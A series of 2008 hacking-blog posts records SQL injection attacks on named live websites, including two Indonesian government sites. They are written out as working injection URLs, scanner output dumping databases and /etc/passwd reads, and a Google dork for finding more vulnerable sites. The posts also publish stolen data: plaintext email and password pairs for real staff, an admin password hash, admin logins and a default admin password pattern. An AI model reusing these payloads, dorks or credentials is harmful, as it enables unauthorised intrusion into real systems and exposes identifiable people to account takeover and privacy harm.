viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Monday, November 24, 2008

[SQLi] http://www.grouply.com

5:53 PM Posted by viperfx07 No comments
Intro: it's like the http://www.faniq.com case, i'm tired being invited to join some sites that are not even useful for me :) I decided to check, and again, voila, it's vulnerable :)

PoC: http://www.grouply.com/register.php?rem=[SQLi]
Demo: http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3/*

Database info:
[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:42:27
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: prod_collective
User: bg@web1.grouply.com
Version: 5.0.45-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,concat(user,0x3a,password),3/**/FROM/**/mysql.user/*

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,load_file(0x2f6574632f706173737764),3/*

[-] [17:42:30]
[-] Total URL Requests 3
[-] Done

[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:42:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: prod_collective
User: bg@web1.grouply.com
Version: 5.0.45-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 264

[0]mysql
[1]prod_collective
[2]prod_common
[3]prod_federated
[4]prod_postfix
[5]prod_stats
[6]prod_tmp
[7]prod_user0
[8]prod_user1
[9]prod_user10
[10]prod_user100
[11]prod_user101
[12]prod_user102
[13]prod_user103
[14]prod_user104
[15]prod_user105
[16]prod_user106
[17]prod_user107
[18]prod_user108
[19]prod_user109
[20]prod_user11
[21]prod_user110
[22]prod_user111
[23]prod_user112
[24]prod_user113
[25]prod_user114
[26]prod_user115
[27]prod_user116
[28]prod_user117
[29]prod_user118
[30]prod_user119
[31]prod_user12
[32]prod_user120
[33]prod_user121
[34]prod_user122
[35]prod_user123
[36]prod_user124
[37]prod_user125
[38]prod_user126
[39]prod_user127
[40]prod_user128
[41]prod_user129
[42]prod_user13
[43]prod_user130
[44]prod_user131
[45]prod_user132
[46]prod_user133
[47]prod_user134
[48]prod_user135
[49]prod_user136
[50]prod_user137
[51]prod_user138
[52]prod_user139
[53]prod_user14
[54]prod_user140
[55]prod_user141
[56]prod_user142
[57]prod_user143
[58]prod_user144
[59]prod_user145
[60]prod_user146
[61]prod_user147
[62]prod_user148
[63]prod_user149
[64]prod_user15
[65]prod_user150
[66]prod_user151
[67]prod_user152
[68]prod_user153
[69]prod_user154
[70]prod_user155
[71]prod_user156
[72]prod_user157
[73]prod_user158
[74]prod_user159
[75]prod_user16
[76]prod_user160
[77]prod_user161
[78]prod_user162
[79]prod_user163
[80]prod_user164
[81]prod_user165
[82]prod_user166
[83]prod_user167
[84]prod_user168
[85]prod_user169
[86]prod_user17
[87]prod_user170
[88]prod_user171
[89]prod_user172
[90]prod_user173
[91]prod_user174
[92]prod_user175
[93]prod_user176
[94]prod_user177
[95]prod_user178
[96]prod_user179
[97]prod_user18
[98]prod_user180
[99]prod_user181
[100]prod_user182
[101]prod_user183
[102]prod_user184
[103]prod_user185
[104]prod_user186
[105]prod_user187
[106]prod_user188
[107]prod_user189
[108]prod_user19
[109]prod_user190
[110]prod_user191
[111]prod_user192
[112]prod_user193
[113]prod_user194
[114]prod_user195
[115]prod_user196
[116]prod_user197
[117]prod_user198
[118]prod_user199
[119]prod_user2
[120]prod_user20
[121]prod_user200
[122]prod_user201
[123]prod_user202
[124]prod_user203
[125]prod_user204
[126]prod_user205
[127]prod_user206
[128]prod_user207
[129]prod_user208
[130]prod_user209
[131]prod_user21
[132]prod_user210
[133]prod_user211
[134]prod_user212
[135]prod_user213
[136]prod_user214
[137]prod_user215
[138]prod_user216
[139]prod_user217
[140]prod_user218
[141]prod_user219
[142]prod_user22
[143]prod_user220
[144]prod_user221
[145]prod_user222
[146]prod_user223
[147]prod_user224
[148]prod_user225
[149]prod_user226
[150]prod_user227
[151]prod_user228
[152]prod_user229
[153]prod_user23
[154]prod_user230
[155]prod_user231
[156]prod_user232
[157]prod_user233
[158]prod_user234
[159]prod_user235
[160]prod_user236
[161]prod_user237
[162]prod_user238
[163]prod_user239
[164]prod_user24
[165]prod_user240
[166]prod_user241
[167]prod_user242
[168]prod_user243
[169]prod_user244
[170]prod_user245
[171]prod_user246
[172]prod_user247
[173]prod_user248
[174]prod_user249
[175]prod_user25
[176]prod_user250
[177]prod_user251
[178]prod_user252
[179]prod_user253
[180]prod_user254
[181]prod_user255
[182]prod_user26
[183]prod_user27
[184]prod_user28
[185]prod_user29
[186]prod_user3
[187]prod_user30
[188]prod_user31
[189]prod_user32
[190]prod_user33
[191]prod_user34
[192]prod_user35
[193]prod_user36
[194]prod_user37
[195]prod_user38
[196]prod_user39
[197]prod_user4
[198]prod_user40
[199]prod_user41
[200]prod_user42
[201]prod_user43
[202]prod_user44
[203]prod_user45
[204]prod_user46
[205]prod_user47
[206]prod_user48
[207]prod_user49
[208]prod_user5
[209]prod_user50
[210]prod_user51
[211]prod_user52
[212]prod_user53
[213]prod_user54
[214]prod_user55
[215]prod_user56
[216]prod_user57
[217]prod_user58
[218]prod_user59
[219]prod_user6
[220]prod_user60
[221]prod_user61
[222]prod_user62
[223]prod_user63
[224]prod_user64
[225]prod_user65
[226]prod_user66
[227]prod_user67
[228]prod_user68
[229]prod_user69
[230]prod_user7
[231]prod_user70
[232]prod_user71
[233]prod_user72
[234]prod_user73
[235]prod_user74
[236]prod_user75
[237]prod_user76
[238]prod_user77
[239]prod_user78
[240]prod_user79
[241]prod_user8
[242]prod_user80
[243]prod_user81
[244]prod_user82
[245]prod_user83
[246]prod_user84
[247]prod_user85
[248]prod_user86
[249]prod_user87
[250]prod_user88
[251]prod_user89
[252]prod_user9
[253]prod_user90
[254]prod_user91
[255]prod_user92
[256]prod_user93
[257]prod_user94
[258]prod_user95
[259]prod_user96
[260]prod_user97
[261]prod_user98
[262]prod_user99
[263]test

[-] [17:47:11]
[-] Total URL Requests 266
[-] Done


[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*
[+] Evasion Used: "/**/" "/*"
[+] 17:47:59
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: prod_collective
User: bg@web1.grouply.com
Version: 5.0.45-log
[+] Showing Tables & Columns from database "prod_collective"
[+] Number of Tables: 39

[Database]: prod_collective
[Table: Columns]
[0]g_accesscode: code,enabled,category,comment
[1]g_bookmark: row_id,user_id,message_id,group_id,bookmarked_flg,note,created,last_upd_tm
[2]g_digest_stats: user_id,updated,num_messages_displayed,proc_time_secs,num_groups,highlights_tm,new_msg_query_tm,total_digest_tm
[3]g_download_task_0: row_id,created,last_upd,host,logic_proc_num,group_id,group_name,u1_user_id,u1_username,u1_y_username,u1_y_password1,u1_captcha_tm,u2_user_id,u2_username,u2_y_username,u2_y_password1,u2_captcha_tm,c0_flg,c1_flg,c2_flg,c3_flg,c4_flg,c5_flg,c6_flg,c7_flg,c8_flg,c9_flg,c10_flg,c11_flg,c12_flg,c13_flg,c14_flg,c15_flg,status0,status1,status2,status3,status4,status5,status6,status7,status8,status9,status10,status11,status12,status13,status14,status15
[4]g_download_task_1: row_id,created,last_upd,host,logic_proc_num,group_id,group_name,u1_user_id,u1_username,u1_y_username,u1_y_password1,u1_captcha_tm,u2_user_id,u2_username,u2_y_username,u2_y_password1,u2_captcha_tm,c0_flg,c1_flg,c2_flg,c3_flg,c4_flg,c5_flg,c6_flg,c7_flg,c8_flg,c9_flg,c10_flg,c11_flg,c12_flg,c13_flg,c14_flg,c15_flg,status0,status1,status2,status3,status4,status5,status6,status7,status8,status9,status10,status11,status12,status13,status14,status15
[5]g_download_track: row_id,created,type,group_name,group_id,download_msg_count,status_nc,int_x1,int_x2,int_x3,int_x4,int_x5,char_x1,char_x2,char_x3,char_x4,char_x5
[6]g_downloadmsg_proc: row_id,created,start_tm,host,pid,type,group_name,username,comments
[7]g_email_to_author: row_id,created,recipient,recipient_email,recipient_id,subject,sender_id,template_code,msg_body
[8]g_gap: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[9]g_gap_20080630: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[10]g_gap_backup: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[11]g_gap_backup20080511: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[12]g_gap_backup20080611: row_id,group_id,group_name,msg_num,last_upd_tm,priority_nc,detect_tm
[13]g_gm_dedup: row_id,shard_num,gm_id
[14]g_group_auth: row_id,group_name,group_id,auth_code,auth_tm,lockout_upd_tm
[15]g_group_auth_track: row_id,created,group_auth_id,group_name,ip,desc_text
[16]g_group_c: row_id,name,state,msg_num_d,gap_checked_msg_num,lock_status,archived_resolved_flg,archived_msg_flg,msg_status_tm,lock_status_tm
[17]g_group_member_c: row_id,group_id,user_id,y_profile_flg,group_status_tm,group_status,email_fwd_flg,email_fwd_flg_tm,email,g_email_flg
[18]g_mail: row_id,created,mail_act_id,desc_text,comments,recipient_count,to_email,group_name,f_name,l_name,status,reminder_count,par_mail_id
[19]g_mail_act: row_id,created,user_id,template_id,act_code,user_email,group_count,register_code,mail_trackid,source_page,reminded_flg,ip,comments
[20]g_mail_response: row_id,created,ip,register_code,mail_track_id,action_nc
[21]g_mail_response_invalid: row_id,created,ip,register_code,mail_track_id,action_nc
[22]g_mail_template: row_id,created,last_upd,src_type_cd,custom_flg,status,subject,desc_text,tempting_text,comments,last_upd_by
[23]g_popular_group: row_id,group_id,group_name,rank
[24]g_rating: row_id,created,user_id,group_id,message_id,first_flg,rating,last_upd_tm
[25]g_refresh_q: row_id,created,user_id,host,process_id
[26]g_tag: row_id,created,user_id,group_id,message_id,tag,seq
[27]g_tip: row_id,tip_num,desc_text,created
[28]g_uauthor_obsolete: row_id,uname,status,status_tm,group_name,msg_num
[29]g_unarchive: row_id,created,group_name,group_id,req_tm,status,status_tm,start_tm,end_tm
[30]g_update: row_id,created,user_id,group_id,message_id,update_count,last_upd_tm
[31]g_user_c: row_id,group_sync_status,group_sync_status_tm,captcha_status,captcha_ip,captcha_status_tm,sync_req_tm,lock_status,lock_status_tm,y_password_status,y_password_status_tm,download_last_tm
[32]g_user_c2: row_id,created,ref_user_id
[33]g_user_c3: row_id,created,ref_user_id,login_tm
[34]g_user_delete: row_id,created,username,confirm_email,group_count,del_req_tm,status,status_tm
[35]g_user_stats: user_id,new_user_count,entry_count,new_user_count_7d,new_user_count_30d,new_user_count_all
[36]g_view: row_id,user_id,group_id,message_id,read_flg,view_count,created,last_upd_tm
[37]g_waitinglist: time,email
[38]g_webconn_proc: row_id,created,start_tm,host,pid,logic_proc_num,status,next_new_group_cycle,last_cycle,last_status,last_run_tm,last_duration,last_msg_count,scheduled_groups,finished_groups,ok_groups,noarchive_groups,overlimit_groups,invalidpass_groups,nonenglish_groups,triplenine_groups,captcha_groups,no_user_groups,server_error_groups,other_failed_groups,comments

[-] [17:55:42]
[-] Total URL Requests 393
[-] Done

Sunday, November 23, 2008

[SQLi] http://www.faniq.com

6:03 PM Posted by viperfx07 No comments
Intro: it was funny. I found this vulnerability when i was about to unsubscribe, and voila, it was vulnerable. The password is not encrypted, so there is a chance that we can access members' email that has the password as they entered when they were registering.

PoC : http://www.faniq.com/unsubscribe.php?invite_id=[SQLi]
Demo: http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat_ws(0x3a,user(),database(),version())--

Tools: schemafuzz.py v5.0
Admin page: http://www.faniq.com/admin/
Admin usr/pwd query:
- step 1 (get the member id with admin privilege): http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat_ws(0x3a,member_id,admin)+from+member_privs+where+admin=char(0x59)--

- step 2 (get email & password with member_id in step 1): http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat_ws(0x3a,member_id,email,password)+from+member+where+member_id=char(0x3134)--

Screenshot of admin page:


Database info:
[+] URL:http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 17:40:49
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: FANIQ
User: sport@10.10.11.135
Version: 5.0.45-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t [!] http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+concat(user,0x3a,password)+FROM+mysql.user-- [+] Do we have Access to Load_File: Yes <-- w00t w00t [!] http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764)-- [-] [17:40:58] [-] Total URL Requests 3 [-] Done

[+] URL:http://www.faniq.com/unsubscribe.php?invite_id=64954193+AND+1=2+UNION+SELECT+sqli--
[+] Evasion Used: "+" "--"
[+] 17:41:14
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: FANIQ
User: sport@10.10.11.135
Version: 5.0.45-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 4

[0]FANIQ
[1]STATS
[2]mysql
[3]test

[-] [17:41:26]
[-] Total URL Requests 6
[-] Done

Saturday, November 22, 2008

[SQLi] http://www.broadsword.com.au

8:32 PM Posted by viperfx07 No comments
Tools: schemafuzz.py
Database info: [+] URL: http://www.broadsword.com.au/news.php?id=35+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6--
[+] Evasion Used: "+" "--"
[+] 20:20:43
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: broadsword
User: broadsword@localhost
Version: 4.1.22
[+] Dumping data from database "broadsword" Table "users"
[+] and Column(s) ['email', 'password']
[+] Number of Rows: 13

[0] sharon@broadsword.com.au:cameron:
[1] suzanne@broadsword.com.au:elise:
[2] drewp@broadsword.com.au:dr3w2006:
[3] ianf@broadsword.com.au:flett07:
[4] brain@broadsword.com.au:gus2208:
[5] gerald@broadsword.com.au:hockey1:
[6] castle@broadsword.com.au:col69:
[7] piers@broadsword.com.au:poohey:
[8] stuartk@broadsword.com.au:miranda1:
[9] dominicr@broadsword.com.au:zaq12wsx:
[10] pas.dimuccio@broadsword.com.au:sales2008:
[11] daniel.dixon@broadsword.com.au:sales2008:
[12] davidg@broadsword.com.au:sales:

[-] 20:20:46
[-] Total URL Requests 15
[-] Done

[SQLi] http://www.highperformancesailing.com.au

7:17 PM Posted by viperfx07 No comments
Tools = schemafuzz.py
Admin page = http://www.highperformancesailing.com.au/admin/
Admin usr/pwd = admin:admin

Database info:
[+] URL:http://www.highperformancesailing.com.au/news.php?id=31+AND+1=2+UNION+SELECT+0,sqli,2,3--
[+] Evasion Used: "+" "--"
[+] 19:12:04
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sailing_hps
User: sailing_sailing@localhost
Version: 5.0.51a-community

[Database]: sailing_hps
[Table: Columns]
[0]t_about: f_id,f_image,f_image2,f_title,f_content,f_content_small
[1]t_admin: f_id,f_username,f_password
[2]t_contact: f_id,f_address,f_phone,f_fax,f_email,f_post,f_map,f_content
[3]t_course: f_id,f_name,f_image,f_elements,f_content,f_content_small
[4]t_course_class2: f_id,f_coursid,f_name,f_image,f_content,f_elements
[5]t_course_class3: f_id,f_coursid,f_cours2id,f_name,f_image,f_content,f_elements
[6]t_link: f_id,f_name,f_type,f_image,f_url
[7]t_linktype: f_id,f_title
[8]t_news: f_id,f_title,f_content,f_addtime
[9]t_photo: f_id,f_title,f_image,f_content,f_addtime
[10]t_price: f_id,f_type,f_name,f_money
[11]t_price_type: f_id,f_title
[12]t_staff: f_id,f_name,f_job,f_intro,f_photo,f_addtime
[13]t_staff_match: f_id,f_staffid,f_year,f_type,f_match,f_city,f_country,f_place
[14]t_staff_title: f_id,f_staffid,f_certify,f_title
[15]t_testimonial: f_id,f_test,f_name,f_addtime

[-] [19:13:28]
[-] Total URL Requests 82
[-] Done


[+] URL:http://www.highperformancesailing.com.au/news.php?id=31+AND+1=2+UNION+SELECT+0,sqli,2,3--
[+] Evasion Used: "+" "--"
[+] 19:14:40
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sailing_hps
User: sailing_sailing@localhost
Version: 5.0.51a-community
[+] Dumping data from database "sailing_hps" Table "t_admin"
[+] Column(s) ['f_username', 'f_password']
[+] Number of Rows: 1

[0] admin:21232f297a57a5a743894a0e4a801fc3

[-] [19:14:43]
[-] Total URL Requests 3
[-] Done

[SQLi] http://www.westcare.com.au

6:52 PM Posted by viperfx07 No comments
Tools: schemafuzz.py
Admin page: http://www.westcare.com.au/admin/

[+] URL:http://www.westcare.com.au/news.php?id=26+AND+1=2+UNION+SELECT+sqli,1--
[+] Evasion Used: "+" "--"
[+] 18:49:07
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: westcare_cms
User: westcare_cmsuser@localhost
Version: 5.0.51a-community

[Database]: westcare_cms
[Table: Columns]
[0]code: id,class,description,value,sort_order,status,targetsite,parent_id
[1]main_category: id,description,value,site
[2]main_content: id,ver,author,title,category,description,body,displaydate,active,isdeleteable,iseditable,site
[3]menu: id,link,class,name,target,active,priority,root_id,parent_id,is_deletable,site
[4]news_category: id,description,value,site
[5]news_content: id,author,title,excerp,body,category,createddate,displaydate,expiresdate,updateddate,active,description,isdeleteable,site
[6]users: id,email,password,firstname,lastname,editorinterface,lastloggedin,active

[-] [18:49:44]
[-] Total URL Requests 63
[-] Done


[+] URL:http://www.westcare.com.au/news.php?id=26+AND+1=2+UNION+SELECT+sqli,1--
[+] Evasion Used: "+" "--"
[+] 18:50:25
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: westcare_cms
User: westcare_cmsuser@localhost
Version: 5.0.51a-community
[+] Dumping data from database "westcare_cms" Table "users"
[+] Column(s) ['email', 'password']
[+] Number of Rows: 2

[0] websupport@tsacorporation.com:ts@c0rp0r@ti0n:
[1] tanya.mcdonald@westcare.com.au:marketing:marketing:

[-] [18:50:26]
[-] Total URL Requests 4
[-] Done

[SQLi] BigKid Designs Websites

6:34 PM Posted by viperfx07 No comments
Dork = inurl:news.php?p=shw
PoC = http://www.site.com/news.php?p=shw&id=[SQLi]
Demo = http://www.warnemarketing.com.au/news.php?p=shw&id=47+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8--

Database structure:
[+] URL:http://www.warnemarketing.com.au/news.php?p=shw&id=47+AND+1=2+UNION+SELECT+0,1,2,unhex(hex(sqli)),4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 18:08:49
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: warne_warne
User: warne_warne@localhost
Version: 5.0.51a-community-log

[Database]: warne_warne
[Table: Columns]
[0]admin: adm_id,adm_email,adm_fname,adm_lname,adm_login,adm_pass
[1]articles: a_id,a_date,a_title,a_cat,a_desc,a_ftype,a_file,a_pub
[2]articles_cats: a_c_id,a_c_name
[3]articles_types: a_t_id,a_t_name,a_t_type,a_t_icon
[4]kid_casestudy: cs_id,cs_date,cs_name,cs_problem,cs_solution,cs_final,cs_logo,cs_image,cs_pub
[5]news: n_id,n_date,n_time,n_title,n_news,n_name,n_image,n_comm,n_pub
[6]news_comm: n_c_id,n_c_idnum,n_c_name,n_c_email,n_c_comm,n_c_date,n_c_time,n_c_pub
[7]pages: pg_id,pg_name,pg_title,pg_description,pg_keywords,pg_revisit,pg_content
[8]testimonials: test_id,test_date,test_name,test_cname,test_pos,test_testimony,test_pub

[-] [18:10:40]
[-] Total URL Requests 62
[-] Done


Admin page = http://www.site.com/admin/
Admin login default = bigkid:emijane[N]
Note: Replace [N] with 1 - 9

Friday, November 21, 2008

[SQLi] http://www.imigrasi.co.id

5:25 PM Posted by viperfx07 No comments
PoC: http://www.imigrasi.go.id/index.php?go=pelayanan&pelIdnya=[SQli]
Demo: http://www.imigrasi.go.id/index.php?go=pelayanan&pelIdnya=1+and+1=2+union+select+1,2,concat_ws(0x3a,usrID,usrPwd),4,5,6,7,8+from+users+limit+0,1--

Tools: RainbowCrack at irc.plain-text.info
Admin usr/pwd: admin:123qweasdzxc
Admin login page: http://www.imigrasi.co.id/login.php
Comment: mysql db can also be dumped.

Screenshot:



Sunday, November 16, 2008

[SQLi] http://www.dotaportal.com

10:14 AM Posted by viperfx07 No comments
PoC: http://www.dotaportal.com/index.php?act=items&id=[SQLi]

Demo: http://www.dotaportal.com/index.php?act=items&id=151'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7/*

Database info:
[+] URL:http://www.dotaportal.com/index.php?act=items&id=151'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3,4,5,6,7/*
[+] Evasion Used: "/**/" "/*"
[+] 10:40:26
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dotaportal
User: dotaportal@192.168.10.21
Version: 5.0.32-Debian_7etch6-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0]dotaportal
[1]meetyourmakers

Friday, November 14, 2008

[SQLi] http://www.gunungkidulkab.go.id

1:58 PM Posted by viperfx07 No comments
Tool: schemafuzz.py v5.0
Admin login loc: http://www.gunungkidulkab.go.id/gerbangkabupaten.php
Problem: can't login?

[+] URL:http://www.gunungkidulkab.go.id/home.php?mode=content&id=177+AND+1=2+UNION+SELECT+0,1,2,3,4,sqli,6,7,8,9,10,11,12,13--
[+] Evasion Used: "+" "--"
[+] 13:17:12
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: dbportalgunungkidul
User: gunungkidulkab.g@localhost
Version: 5.0.38-Ubuntu_0ubuntu1-log


[Database]: dbportalgunungkidul
[Table: Columns]
[0]detail_kategori: id,idk,name
[1]detail_kfoto: idk,idf,name,keterangan,nama_file,tanggal,klik
[2]kategori: id,name,keterangan
[3]petadetail_kategori: id,idk,name
[4]petadetail_kfoto: idk,idf,name,keterangan,nama_file,tanggal,klik
[5]petakategori: id,name,keterangan
[6]t_content: content_id,kategori_id,subkategori_id,content_judul,content_deskripsi,content_isi,content_adafoto,content_file,content_tglentri,content_baca,content_isaktif,login
[7]t_footer: footer_id,footer_judul,footer_isaktif
[8]t_group: group_id,group_nama
[9]t_jenislink: jenislink_id,jenislink_nama,jenislink_isaktif
[10]t_kategori: kategori_id,posisimenu_id,kategori_urut,kategori_nama,kategori_isaktif
[11]t_linksite: linksite_id,jenislink_id,linksite_nama,linksite_situs,linksite_gambar,linksite_isaktif
[12]t_marquee: marquee_id,marquee_isi,marquee_isaktif
[13]t_posisimenu: posisimenu_id,posisimenu_nama,posisimenu_isaktif
[14]t_setinghome: setinghome_id,posisimenu_id,setinghome_urut,setinghome_subjek,setinghome_versi,setinghome_keterangan,setinghome_fileprogram,setinghome_filetemplate,setinghome_isaktif
[15]t_slogan: slogan_id,slogan_nama,slogan_foto,slogan_isaktif
[16]t_smsbaner: smsbaner_id,smsbaner_nama,smsbaner_foto,smsbaner_isaktif
[17]t_subkategori: subkategori_id,kategori_id,subkategori_urut,subkategori_nama,subkategori_isaktif,subkategori_file,subkategori_tinggigbr,subkategori_lebargbr,subkategori_adagbr
[18]tblbtamu: tblbtamu_id,tblbtamu_name,tblbtamu_email,tblbtamu_location,tblbtamu_url,tblbtamu_comment,tblbtamu_tanggal,tblbtamu_waktu,tblbtamu_ip
[19]tblbukutamu: tblbukutamu_id,tblbukutamu_ip,tblbukutamu_induk,tblbukutamu_nama,tblbukutamu_email,tblbukutamu_judul,tblbukutamu_isi,tblbukutamu_isaktif,tblbukutamu_tgljam
[20]tblcdiskusi: tblcdiskusi_id,tbldiskusi_id,tblcdiskusi_name,tblcdiskusi_email,tblcdiskusi_comment,tblcdiskusi_tanggal,tblcdiskusi_waktu
[21]tblcide: tblcide_id,tblide_id,tblcide_name,tblcide_email,tblcide_comment,tblcide_tanggal,tblcide_waktu
[22]tblcontent: tblcontent_id,tblweblayoutmenudetil_id,tblcontent_nama
[23]tbldiskusi: tbldiskusi_id,tbldiskusi_name,tbldiskusi_email,tbldiskusi_location,tbldiskusi_url,tbldiskusi_judul,tbldiskusi_comment,tbldiskusi_tanggal,tbldiskusi_waktu
[24]tblide: tblide_id,tblide_name,tblide_email,tblide_location,tblide_url,tblide_judul,tblide_comment,tblide_tanggal,tblide_waktu
[25]tblinfokecamatan: tblinfokecamatan_id,tblkecamatan_id,tblinfokecamatan_luas,tblinfokecamatan_petaadmin,tblinfokecamatan_jumpenduduk,tblinfokecamatan_kepadatan,tblinfokecamatan_pendapatanperkapita,tblinfokecamatan_potensi,tblinfokecamatan_rencanabangunkembang,tblinfokecamatan_rtmiskin,tblinfokecamatan_tanggal
[26]tblinstansi: tblinstansi_id,tbljnsinstansi_id,tblinstansi_nama
[27]tbljnsinstansi: tbljnsinstansi_id,tbljnsinstansi_nama
[28]tblkecamatan: tblkecamatan_id,tblkecamatan_nama
[29]tblkelompok: tblkelompok_id,tblkelompok_nama,tblkelompok_isaktif
[30]tblkelompoklink: tblkelompoklink_id,tblkelompoklink_nama,tblkelompoklink_url,tblkelompoklink_namafile,tblkelompoklink_isaktif
[31]tblkelompoksub: tblkelompok_id,tblkelompoksub_id,tblkelompoksub_keterangan,tblkelompoksub_namafile,tblkelompoksub_url,tblkelompoksub_isaktif
[32]tblkomentar: tblkomentar_id,tblbtamu_id,tblkomentar_name,tblkomentar_email,tblkomentar_location,tblkomentar_comment,tblkomentar_tanggal,tblkomentar_waktu,tblkomentar_ip
[33]tblkonkomentar: tblkonkomentar_id,tblkontak_id,tblkonkomentar_name,tblkonkomentar_email,tblkonkomentar_location,tblkonkomentar_comment,tblkonkomentar_tanggal,tblkonkomentar_waktu
[34]tblkontak: tblkontak_id,tblkontak_name,tblkontak_email,tblkontak_location,tblkontak_url,tblkontak_comment,tblkontak_tanggal,tblkontak_waktu
[35]tbllappengendalian: tbllappengendalian_id,tblinstansi_id,tbljnsinstansi_id,tbllappengendalian_keuanganjumdana,tbllappengendalian_keuangansasaran,tbllappengendalian_keuangansasaranpersen,tbllappengendalian_keuanganrealisasi,tbllappengendalian_keuanganrealisasipersen,tbllappengendalian_keuanganratos,tbllappengendalian_fisiktimbangsasaran,tbllappengendalian_fisiktimbangrealisasi,tbllappengendalian_fisikratos,tbllappengendalian_kondisibulanawal,tbllappengendalian_kondisibulanakhir,tbllappengendalian_tahunawal,tbllappengendalian_tahunakhir
[36]tblmenu: tblmenu_id,tblmenu_menu,tblmenu_level,tblmenu_induk,tblmenu_isaktif
[37]tblmulmed: tblmulmedinduk_id,tblmulmed_id,tblmulmed_judul,tblmulmed_deskripsi,tblmulmed_kapasitas,tblmulmed_namafile,tblmulmed_tanggal,tblmulmed_istayang
[38]tblmulmedinduk: tblmulmedinduk_id,tblmulmedinduk_kategori,tblmulmedinduk_istayang
[39]tblpengguna: tblpengguna_id,tblpengguna_login,tblpengguna_pass,tblpengguna_nama,tblgroup_id,tblpengguna_isaktif,tblpengguna_to
[40]tblsubcontent: tblsubcontent_id,tblcontent_id,tblsubcontent_nam,tblsubcontent_isi
[41]tblsubdomainlink: tblsubdomainlink_id,tblsubdomainlink_nama,tblsubdomainlink_url,tblsubdomainlink_namafile,tblsubdomainlink_isaktif
[42]tblweblayout: tblweblayout_id,tblweblayout_nama,tblweblayout_tglupdate,tblweblayout_namafile,tblweblayout_isaktif,tblpengguna_id
[43]tblweblayoutkontent: tblweblayoutkontent_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutmenu_id,tblweblayoutmenudetil_id,tblweblayoutkontent_urut,tblweblayoutkontent_judul,tblweblayoutkontent_isi,tblweblayoutkontent_tglupdate,tblweblayoutkontent_isfile,tblweblayoutkontent_namafile,tblweblayoutkontent_istayang,tblpengguna_id,tblweblayoutkontent_klik
[44]tblweblayoutmenu: tblweblayoutmenu_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutmenu_nama,tblweblayoutmenu_urut,tblweblayoutmenu_isaktif,tblpengguna_id
[45]tblweblayoutmenudetil: tblweblayoutmenudetil_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutmenu_id,tblweblayoutmenudetil_nama,tblweblayoutmenudetil_urut,tblweblayoutmenudetil_induk,tblweblayoutmenudetil_isaktif,tblweblayoutmenudetil_home,tblweblayoutmenudetil_modetampil,tblpengguna_id,tblweblayoutmenudetil_privileges
[46]tblweblayoutmenudetilfile: tblweblayoutmenudetilfile_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutmenu_id,tblweblayoutmenudetil_id,tblweblayoutmenudetilfile_ket,tblweblayoutmenudetilfile_namafile,tblpengguna_id
[47]tblweblayoutmenudetilpengguna: tblweblayoutmenudetilpengguna_id,tblweblayout_id,tblweblayoutposisi_id,tblweblayoutmenu_id,tblweblayoutmenudetil_id,tblpengguna_id
[48]tblweblayoutposisi: tblweblayoutposisi_id,tblweblayout_id,tblweblayoutposisi_urut,tblweblayoutposisi_nama,tblweblayoutposisi_lokasi,tblweblayoutposisi_fileprogram,tblweblayoutposisi_filetemplate,tblweblayoutposisi_isaktif,tblweblayoutposisi_ismenu,tblpengguna_id,tblweblayoutposisi_ishome
